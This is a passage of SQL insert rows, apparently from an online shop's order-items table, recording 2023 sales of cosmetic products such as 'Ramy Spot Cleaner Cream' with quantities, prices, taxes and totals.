(62, 111, '2023-07-17 15:19:38', '2023-07-17 15:19:40', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 2.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 108.0000, 108.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(63, 116, '2023-08-05 00:46:20', '2023-08-05 00:46:20', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(64, 117, '2023-08-05 00:47:29', '2023-08-05 00:47:29', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(65, 307, '2023-08-13 11:42:06', '2023-08-13 11:42:08', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 2.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 108.0000, 108.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(66, 308, '2023-08-13 12:28:37', '2023-08-13 12:28:38', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 2.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 108.0000, 108.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(67, 309, '2023-08-14 13:10:54', '2023-08-14 13:10:54', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(68, 310, '2023-08-16 10:05:14', '2023-08-16 10:05:14', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(69, 311, '2023-08-16 18:20:35', '2023-08-16 18:20:35', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(70, 312, '2023-08-17 11:54:35', '2023-08-17 11:54:36', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 2.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 108.0000, 108.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(71, 313, '2023-08-17 12:00:39', '2023-08-17 12:00:40', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 2.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 108.0000, 108.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(72, 314, '2023-08-18 02:18:36', '2023-08-18 02:18:36', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(73, 315, '2023-08-18 02:18:37', '2023-08-18 02:18:37', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(74, 316, '2023-08-20 05:41:05', '2023-08-20 05:41:08', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 2.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 108.0000, 108.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(75, 318, '2023-09-03 04:21:45', '2023-09-03 04:21:47', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 2.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 108.0000, 108.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(76, 319, '2023-09-03 14:58:59', '2023-09-03 14:59:00', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 2.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 108.0000, 108.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(77, 320, '2023-09-04 11:08:13', '2023-09-04 11:08:15', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 2.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 108.0000, 108.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(78, 323, '2023-09-13 03:01:27', '2023-09-13 03:01:27', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(79, 324, '2023-09-18 14:43:03', '2023-09-18 14:43:03', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(80, 325, '2023-10-04 10:07:55', '2023-10-04 10:07:55', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(81, 326, '2023-10-05 06:18:06', '2023-10-05 06:18:08', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 2.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 108.0000, 108.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(82, 327, '2023-10-05 06:52:15', '2023-10-05 06:52:16', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 2.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 108.0000, 108.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(83, 328, '2023-10-08 04:50:32', '2023-10-08 04:50:32', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(84, 329, '2023-10-09 16:45:53', '2023-10-09 16:45:53', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(85, 330, '2023-10-19 04:22:11', '2023-10-19 04:22:17', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2,3', NULL, 0, 0, 100.0000, 5.0000, 111.0000, 111.0000, NULL, 20.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 555.0000, 555.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 555.0000, 555.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(86, 330, '2023-10-19 04:23:11', '2023-10-19 04:24:09', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2,3', NULL, 0, 0, 1.0000, 65.0000, 54.0000, 54.0000, NULL, 20.0000, 702.0000, 702.0000, 0.0000, 0.0000, 0.0000, 3510.0000, 3510.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 3510.0000, 3510.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(87, 330, '2023-10-19 04:24:08', '2023-10-19 04:24:32', 2058, 1, NULL, 0, 'RAMY SPOT LESS FAIRNESS CREAM', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 4.0000, 32.0000, 321.0000, 321.0000, NULL, 20.0000, 2054.4000, 2054.4000, 0.0000, 0.0000, 0.0000, 10272.0000, 10272.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 10272.0000, 10272.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(88, 330, '2023-10-19 04:25:09', '2023-10-19 04:25:45', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 32.0000, 321.0000, 321.0000, NULL, 20.0000, 2054.4000, 2054.4000, 0.0000, 0.0000, 0.0000, 10272.0000, 10272.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 10272.0000, 10272.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(89, 330, '2023-10-19 04:26:12', '2023-10-19 04:27:05', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 53.0000, 643.0000, 643.0000, NULL, 20.0000, 6815.8000, 6815.8000, 0.0000, 0.0000, 0.0000, 34079.0000, 34079.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 34079.0000, 34079.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(90, 330, '2023-10-19 04:27:15', '2023-10-19 04:27:15', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(91, 330, '2023-10-19 04:28:52', '2023-10-19 04:28:52', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(92, 331, '2023-11-07 08:36:29', '2023-11-07 08:36:29', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(93, 332, '2023-11-07 08:36:30', '2023-11-07 08:36:30', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(94, 333, '2023-11-07 08:36:30', '2023-11-07 08:36:30', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(95, 334, '2023-11-07 08:36:31', '2023-11-07 08:36:31', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(96, 335, '2023-11-07 08:36:31', '2023-11-07 08:36:31', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(97, 336, '2023-11-09 13:25:23', '2023-11-09 13:25:23', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(98, 337, '2023-11-09 17:46:52', '2023-11-09 17:46:52', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(99, 339, '2023-11-10 16:07:07', '2023-11-10 16:07:07', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(100, 340, '2023-11-12 10:33:05', '2023-11-12 10:33:05', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(101, 341, '2023-11-14 00:50:34', '2023-11-14 00:50:34', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(102, 342, '2023-11-14 01:36:21', '2023-11-14 01:36:21', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(103, 343, '2023-11-14 01:36:21', '2023-11-14 01:36:21', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(104, 344, '2023-11-14 01:36:22', '2023-11-14 01:36:22', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(105, 345, '2023-11-14 01:36:22', '2023-11-14 01:36:22', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(106, 346, '2023-11-16 12:30:30', '2023-11-16 12:30:30', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(107, 347, '2023-11-16 12:31:00', '2023-11-16 12:31:00', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(108, 348, '2023-11-16 12:31:24', '2023-11-16 12:31:24', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(109, 349, '2023-11-16 12:31:45', '2023-11-16 12:31:45', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(110, 350, '2023-11-16 12:32:08', '2023-11-16 12:32:08', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(111, 351, '2023-11-16 12:32:27', '2023-11-16 12:32:27', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(112, 352, '2023-11-20 03:56:33', '2023-11-20 03:56:33', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
